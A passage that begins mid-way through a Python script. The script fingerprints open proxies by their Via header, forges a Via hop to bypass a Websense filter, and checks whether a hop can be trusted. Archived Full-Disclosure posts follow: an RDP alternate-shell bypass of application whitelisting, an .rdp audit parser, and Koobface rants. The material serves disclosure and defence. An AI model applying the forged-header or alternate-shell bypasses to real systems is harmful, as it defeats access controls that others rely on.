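                   b"Content-Length: 0\r\n\r\n")


def parse_via(value):
    """'1.0 10.10.0.2, 1.1 Fran-PC (McAfee Relay Server 5.2.3)' ->
    [('1.0', '10.10.0.2', None), ('1.1', 'Fran-PC', 'McAfee Relay Server 5.2.3')]"""
    return [(m.group("version"), m.group("by"), m.group("comment"))
            for m in VIA_HOP_RE.finditer(value)]


def fingerprint(response_bytes):
    """Product string (or bare pseudonym) from the last Via hop of a
    response; None when the proxy adds no usable Via at all."""
    head, _, _ = response_bytes.partition(b"\r\n\r\n")
    for line in head.decode("latin-1").split("\r\n")[1:]:
        name, _, val = line.partition(":")
        if name.strip().lower() == "via":
            hops = parse_via(val.strip())
            if not hops:
                return None
            return hops[-1][2] or hops[-1][1]
    return None


def probe(proxy_host, proxy_port, target="http://example.com/", timeout=5):
    """One absolute-URI GET through a suspected open proxy; hand the result
    to fingerprint(). Real network I/O, so not part of the offline checks."""
    req = (f"GET {target} HTTP/1.1\r\nHost: example.com\r\n"
           f"Connection: close\r\n\r\n").encode()
    with socket.create_connection((proxy_host, proxy_port), timeout) as s:
        s.sendall(req)
        chunks = []
        while chunk := s.recv(4096):
            chunks.append(chunk)
    return b"".join(chunks)


def bypass_request(url, host, fake_hop="1.0 10.10.0.2"):
    """What the Modify Headers plug-in (or a downstream Squid) sends in the
    PoC: an ordinary proxied GET carrying a Via hop the client invented."""
    return (f"GET {url} HTTP/1.1\r\nHost: {host}\r\nVia: {fake_hop}\r\n"
            f"Connection: close\r\n\r\n").encode()


def via_is_trustworthy(peer_ip, via_value, array_members):
    """The check an upstream proxy should make before treating a request as
    'already filtered': the last Via hop must name a known array member AND
    the TCP peer must be that member. A request from a client subnet that
    carries any Via header fails on both counts."""
    hops = parse_via(via_value or "")
    if not hops:
        return peer_ip in array_members  # no claim made; trust real peers only
    last_by = hops[-1][1]
    return last_by in array_members and peer_ip == array_members[last_by]


if __name__ == "__main__":
    print(fingerprint(SAMPLE_RESPONSE))                            # McAfee Relay Server 5.2.3
    print(bypass_request("http://blocked.example/", "blocked.example").decode())
    print(via_is_trustworthy("10.10.0.2", "1.0 10.10.0.2", ARRAY))  # True
    print(via_is_trustworthy("10.20.5.7", "1.0 10.10.0.2", ARRAY))  # False
```

The point of via_is_trustworthy() is that Via is informational: the RFC obliges proxies to append their hop, but nothing stops a client from writing one, so a filter that keys its "already handled upstream" decision on the header alone is keying it on attacker input. Binding the claim to the connection's actual peer is what Knowledge Base article #5117 and Hotfix 17 had to do in practice, whichever way Websense implemented it.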
Re: [Full-disclosure] Possible RDP vulnerability
As far as RDP is concerned, it's much simpler (and more fun!) to host an Evil RDP Server than it is to hack into one. There is no end to the shenanigans you can create or the havoc you can wreak, if you're into that kind of thing (just sayin'... as a Big Time Security Professional™, I'm not). For instance, this low quality, seldom seen, crappy video (barely) shows how you can get a virus/Trojan/worm/etc. if you are insane enough to attach your local drives to an untrusted RDP server (the popup at the end is the AV going off). http://www.youtube.com/watch?v=UwhqJSmYm_4 EXTRA CREDIT: devise a Group Policy that will prevent users from attaching their local drives to a remote RDP server. - Original Message - From: wicked clown To: Thor (Hammer of God) Cc: Full-Disclosure@lists.grok.org.uk Sent: Saturday, March 27, 2010 7:39 AM Subject: Re: [Full-disclosure] Possible RDP vulnerability I think we are on two different pages :) what I was trying to show is that if you have a group policy that will only run certain applications, for example notepad.exe, the user is unable to access my computer, run or the start button or any other application. There would be a shortcut on the desktop for just notepad.exe for the user to execute. / ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Possible RDP vulnerability
In your case, had you answered the question correctly I would have promised to never (again) blog about you arguing with Craig S. Wright. However, it was a trick question. There is no way to do it with Group Policy (at least not with XP and Server 2003... maybe they changed that in Windows Vis7a and Server 2008, but I really haven't kept up with the tech). - Original Message - From: Thor (Hammer of God) t...@hammerofgod.com To: Mr. Hinky Dink d...@mrhinkydink.com; Full-Disclosure@lists.grok.org.uk Sent: Saturday, March 27, 2010 12:09 PM Subject: RE: [Full-disclosure] Possible RDP vulnerability Oh, sorry I read the question wrong. Just don't allow them to attach their local drives. Simple. Still, what do I win? t ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Possible RDP vulnerability
There is a section in RDP-Tcp Properties on the server under Environment for Do not allow an initial program to be launched. Always show the desktop. - Original Message - From: wicked clown To: Full-Disclosure@lists.grok.org.uk Sent: Friday, March 26, 2010 5:04 AM Subject: [Full-disclosure] Possible RDP vulnerability Hi Guys, I think I may possibly have found a vulnerability with using RDP / Terminal services on windows 2003. If you lock down a server and only allow users who connect to your RDP connection to run certain applications, users can bypass this and run ANY application they want. You can do this by modifying the RDP profile / shortcut and adding your application to the alternate shell and the shell working directory. When the user connects now to the RDP server the banned application will execute upon logging on even though the user isn’t allowed to execute the application if the user logs on normally. This doesn’t work with cmd.exe but I have been able to execute internet explorer, download a modified cmd version, modify the RDP profile to execute the new cmd and it works like a charm. I have only been able to test this on windows 2003 using a local policy and it works like a treat. Even in the wild! I have done a quick basic video which can be seen here: http://www.tombstone-bbs.co.uk/v1d30z/rdp-hack2.swf Instead of modifying the RDP profile, I just added my application to the program tab.. I know the video is crappy but it’s just meant to give you an idea what I am talking about :) So in short, if anybody can access your server via RDP they are NOT restricted by the policy. I would be interested in any feedback about this possible exploit / vulnerability even if you don’t think it is.. or even better if someone knows how to defend against it!! LOL! :) Cheers Wicked Clown. -- ___ Full-Disclosure - We believe in it. 
Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
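The field wicked clown modifies lives in the .rdp profile, a plain-text file of name:type:value lines where the type is i (integer), s (string) or b (hex blob). Below is an added example, not code from this thread: a small parser for that format plus an audit that flags the two settings the post abuses (alternate shell and shell working directory) and, for Hinky's point about attaching local drives, drivestoredirect. The sample profile and the program path in it are constructed placeholders.

```python
"""
Parse and audit .rdp profiles for settings that start a program at logon
or redirect local drives. Constructed example; the sample profile below is
not from the original post.
"""
from dataclasses import dataclass, field

# Settings that launch something other than the user's normal shell.
INITIAL_PROGRAM_KEYS = ("alternate shell", "shell working directory")
# Setting that maps the client's local drives into the session.
DRIVE_REDIRECT_KEY = "drivestoredirect"


@dataclass
class RdpProfile:
    settings: dict = field(default_factory=dict)

    @classmethod
    def parse(cls, text: str) -> "RdpProfile":
        prof = cls()
        for lineno, line in enumerate(text.splitlines(), 1):
            line = line.strip()
            if not line:
                continue
            # Split on the first two colons only: values such as
            # C:\path or host:3389 legitimately contain colons.
            parts = line.split(":", 2)
            if len(parts) != 3:
                raise ValueError(f"line {lineno}: not name:type:value: {line!r}")
            name, typ, value = parts
            name = name.strip().lower()
            if typ == "i":
                prof.settings[name] = int(value)
            elif typ == "s":
                prof.settings[name] = value
            elif typ == "b":
                prof.settings[name] = bytes.fromhex(value)
            else:
                raise ValueError(f"line {lineno}: unknown type {typ!r}")
        return prof

    def findings(self) -> list:
        """Human-readable list of settings a locked-down server should
        not honour from a client-supplied profile."""
        out = []
        for key in INITIAL_PROGRAM_KEYS:
            if self.settings.get(key):
                out.append(f"{key} set to {self.settings[key]!r}")
        if self.settings.get(DRIVE_REDIRECT_KEY):
            out.append(f"local drives redirected: {self.settings[DRIVE_REDIRECT_KEY]!r}")
        return out


def audit_rdp(text: str) -> list:
    """Parse a profile and return its findings (empty list means clean)."""
    return RdpProfile.parse(text).findings()


# Constructed sample profile shaped like the one the post describes:
# a normal connection plus an alternate shell and drive redirection.
SAMPLE_RDP = r"""
screen mode id:i:2
full address:s:server.example:3389
username:s:restricteduser
alternate shell:s:C:\Users\Public\notcmd.exe
shell working directory:s:C:\Users\Public
drivestoredirect:s:*
"""

if __name__ == "__main__":
    for finding in audit_rdp(SAMPLE_RDP):
        print("FINDING:", finding)
```

The audit is client-side triage only; as Hinky's reply says, the setting that actually decides whether an initial program is honoured is on the server under RDP-Tcp Properties, Environment. The parser is also handy for spotting profiles that redirect drives before someone double-clicks one from an untrusted source.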
[Full-disclosure] The Hinky Dink Top 10 Koobface Infested Shitholes Report
Today I was inspired by The Norton Top 10 Riskiest Online Cities Report (http://norton.newslinevine.com/Riskiest_Online_Cities_Press_Release.pdf) so I decided to do my own press release with my own data (in light of recent events).

- The Hinky Dink Top 10 Koobface Infested Shitholes Report Reveals Where Web 2.0's Most PWN3D Users Live

Columbus, Ohio – March 22, 2010 – Mr. Hinky Dink, a Big Time Security Professional™ today released an analysis of the spread of the Koobface worm. Based on an exhaustive study of his database of over two and a half million open Web proxies collected over two years, Hinky's findings demonstrate where the most vulnerable social networking users can be found. The following are ranked the Hinky Top Ten Social Networking Shitholes:

1. Saint Louis
2. Chicago
3. Kansas City
4. Houston
5. Birmingham
6. Dallas
7. Oklahoma City
8. Los Angeles
9. Brooklyn
10. Columbus

The complete report is available at http://www.mrhinkydink.com/Koobface%20Shithole%20Report%2003-22-2010.pdf

- http://twitter.com/mrhinkydink http://mrhinkydink.blogspot.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Setting the record straight on The Return of Koobface
Today I ran across this article... http://www.nst.com.my/Current_News/NST/articles/20100320160620/Article/index_html ... in which it is noted that Kaspersky Labs recently discovered the resurgence of the malicious programme (Koobface) and sounded the alarm. Gentlemen, I beg to differ. I first mentioned the resurgence of Koobface on February 23rd, 2010 here... http://proxyobsession.net/?p=827 I admit I did not sound the alarm. I simply lol'd because Koobface is one sign of the EPIC FAIL of the security industry. Just ask Dancho Danchev. He's made quite a name for himself by doing absolutely nothing worthwhile about Koobface except raising his own blood pressure spewing vitriol about The Koobface Gang (sorry, Danny, but I'm not part of the gang. I'm just another BlogSpot loser). For those wondering, I am not a hacker. I am a Big Time Security Professional (you may remember me if you Google Websense Policy Bypass - unfortunately those bastards at Warner Brothers killed the soundtrack to my YouTube video). But I am at heart a skeptic, disappointed at what the security industry has become. I created my Proxy List (http://www.mrhinkydink.com/proxies.htm) two years ago as a tool for an as yet unpublished paper on open SOCKS proxies in the wild. It has had the unintended side effect of tracking the spread of Koobface, since Kooberz proxies exclusively (until this month) appear on TCP port 8085. And it has tracked it quite well. I'd like to take this opportunity to say Hello (no, not GREETZ) to all the Cameroonian Puppy Scammers (papa Dollars, STARVO, Dabbleed, et al.) who abuse my proxy list. Enough is enough. Get a real job, fellas. http://proxyobession.net http://mrhinkydink.blogspot.com http://twitter.com/mrhinkydink : (Follow me! I have no friends!) : ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Setting the record straight on The Return of Koobface
Absolutely you are correct, but if you check the blog there are further references up to last Friday. It was a tremendous, jaw-dropping flood of Kooberz proxies the last two weeks. And it's still coming. The point is us Little Guys are paying attention, too. And sometimes we catch this shit before the Big Boys like Dancho and Kaspersky wake up and smell the coffee. Since February I've been wondering Why The Hell I hadn't heard anything in the ITsec press on this new resurgence. Did they hold back so Dancho could publish his Ten Things You Didn't Know About The Koobface Gang article? Or so Microsoft could gloat over taking down the Wimpy Waledac botnet? Is the Good News always published before the Bad News in the security industry press release cycle? The fact remains, Koobface marches on and the security industry can't stop it. Period. I will be among the first to jump up and down and yell RA! when someone takes it down, but it ain't going to happen soon. All I can do is sit back and watch while the Big Boys get their headlines. BTW, I don't consider myself bitter. I'm what you might call tangy. Thanks for your support, Hinky - Original Message - From: J Roger To: full-disclosure@lists.grok.org.uk Sent: Saturday, March 20, 2010 3:28 PM Subject: Re: [Full-disclosure] Setting the record straight on The Return of Koobface This reads as waaa I noticed this first and didn't think much of it but now that someone else is making a big deal, I want my credit. Maybe you reported on it first on your blog, with a single sentence that wasn't even the primary focus of the post. Regardless of whether an uprise in koobface is significantly newsworthy or not, you apparently failed to draw enough attention (or the right attention) to it at the time. In other words, maybe you did it first, but someone else did it better. 
What's more valuable to an enterprise, someone that quickly writes a risk assessment that's so sloppy the management with authority to act on the findings don't even bother to read it, or someone that takes the time to write a report on the same findings that actually speaks to the business and is able to make positive changes happen? You talk about being bitter towards the security industry (which IS understandable) but maybe it's time to reflect back a little on yourself. Maybe it's not ALL the industry's fault. Maybe the sources of your bitterness have a little something to do with your inability to make enough of the right things happen. Sure you're a Big Time Security Professional, but maybe your blog wasn't enough to get the word out. Maybe you felt it wasn't even worth getting the word out or sounding any alarms. If that's the case though, don't go back now and try to take credit. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/